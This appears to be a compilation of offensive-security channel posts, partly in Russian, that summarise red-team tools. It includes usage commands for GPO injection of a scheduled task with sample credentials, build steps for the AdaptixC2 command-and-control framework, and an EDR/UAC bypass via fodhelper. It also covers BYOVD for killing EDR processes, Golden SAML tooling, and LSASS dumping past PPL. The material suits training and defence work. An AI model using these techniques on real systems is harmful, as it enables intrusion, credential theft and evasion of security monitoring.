A chained technique has been identified that allows a local, unprivileged attacker to achieve silent privilege escalation to administrator by bypassing protections enforced by Elastic Defend v9.0.4. The method leverages a trusted auto-elevated Windows binary (fodhelper.exe) in conjunction with a registry hijack and COM object execution, resulting in arbitrary code execution at elevated privileges - without triggering a UAC prompt or EDR detection

#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'

#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'

[MODULECONFIG]
name = Scheduled Tasks
type = computer

[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"

[MODULEFILTERS]
filters =
    [{
        "operator": "AND",
        "type": "Computer Name",
        "value": "ad01-srv1.corp.com"
    }]

GPO creation, deletion, backup and injections
Various injectable configurations, with, for each, customizable options (see list in the wiki)
Possibility to remove injected configurations from the target GPO
Possibility to revert the actions performed on client devices
GPO links manipulation
GPO enumeration / user privileges enumeration on GPOs

Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal

sudo apt install mingw-w64 make

wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go

sudo apt install gcc g++ build-essential cmake libssl-dev qt6-base-dev qt6-websockets-dev qt6-declarative-dev

git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
make server
make extenders
make client
cd dist
chmod +x ssl_gen.sh
./ssl_gen.sh

./adaptixserver -profile profile.json
./AdaptixClient

# Discover SCCM servers
SCML.exe --findsccmservers --domain corp.local

# List shares
SCML.exe --host sccm01 --list-shares --current-user

SAMLSmith is a C# tool for generating custom SAML responses and implementing Silver SAML and Golden SAML attacks

What started out as a GUI test and something to muck about with has sort of grown arms and legs. As it stands this is a cross platform GUI app for browsing LDAP and will direct YOLO into a Neo4J database, it comes with LDAP/LDAPS browsing capabilites, it'll run standalone and you can modify it how you like

event.code: 11 and file.path: *Windows\\Temp* and file.extension: dmp

event.code: 5145 and winlog.event_data.ShareName: *.dmp

sudo python3 -m pip install apachetomcatscanner

ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves

Currently, in addition to merely focusing on avoiding scrutiny from EDRs (Endpoint Detection and Response) and Antivirus, the trend of using BYOVD (Bring Your Own Vulnerable Driver) techniques to disable the processes of EDRs and Antivirus by attackers is becoming increasingly popular.

The biggest drawback of the BYOVD technique is the need to find a way to install and execute drivers with vulnerabilities to exploit. Alternatively, a more straightforward approach is to exploit vulnerabilities in existing drivers on Windows

▪️Sensitive keys in codebases
▪️DIND (docker-in-docker) exploitation
▪️SSRF in the Kubernetes (K8S) world
▪️Container escape to the host system
▪️Docker CIS benchmarks analysis
▪️Kubernetes CIS benchmarks analysis
▪️Attacking private registry
▪️NodePort exposed services
▪️Helm v2 tiller to PwN the cluster - [Deprecated]
▪️Analyzing crypto miner container
▪️Kubernetes namespaces bypass
▪️Gaining environment information
▪️DoS the Memory/CPU resources
▪️Hacker container preview
▪️Hidden in layers
▪️RBAC least privileges misconfiguration
▪️KubeAudit - Audit Kubernetes clusters
▪️Falco - Runtime security monitoring & detection
▪️Popeye - A Kubernetes cluster sanitizer
▪️Secure network boundaries using NSP
▪️Cilium Tetragon - eBPF-based Security ▪️Observability and Runtime Enforcement
▪️Securing Kubernetes Clusters using Kyverno Policy Engine

git clone https://github.com/madhuakula/kubernetes-goat.git
cd kubernetes-goat
chmod +x setup-kubernetes-goat.sh
bash setup-kubernetes-goat.sh

bash access-kubernetes-goat.sh

# navigate to http://127.0.0.1:1234

Описание параметров
Примеры использования
Ссылки на полезные ресурсы

➡️ Поддержка Nexmon
➡️ Отказ от ARMel
➡️ Обновлённый плагин (vpn ip) для Xfce

➡️ Caido
➡️ Caido-cli
➡️ Detect It Easy (DiE)
➡️ Gemini CLI
➡️ krbrelayx
➡️ ligolo-mp
➡️ llm-tools-nmap
➡️ mcp-kali-server
➡️ patchleaks
➡️ vwifi-dkms

sudo apt update && sudo apt -y full-upgrade

grep VERSION /etc/os-release

VERSION="2025.3"
VERSION_ID="2025.3"
VERSION_CODENAME="kali-rolling"

Если DA подключен к серверу, на котором вы являетесь локальным администратором, просто создайте запланированную задачу, запрашивающую сертификат от его имени, получите сертификат (pfx) и его личные данные. Все это автоматизировано в данном модуле

nxc smb dc -d dom.local -u 'high_priv' -p 'high_priv123' -M schtask_as

scmr - Service Control Manager (MS-SCMR)
tsch - Task Scheduler (MS-TSCH)
dcom - Distributed Component Object Model (MS-DCOM)
wmi - Windows Management Instrumentation (MS-WMI)

This is a tool that uses the old WerfaultSecure.exe program to dump the memory of processes protected by PPL (Protected Process Light), such as LSASS.EXE. The output is in Windows MINIDUMP format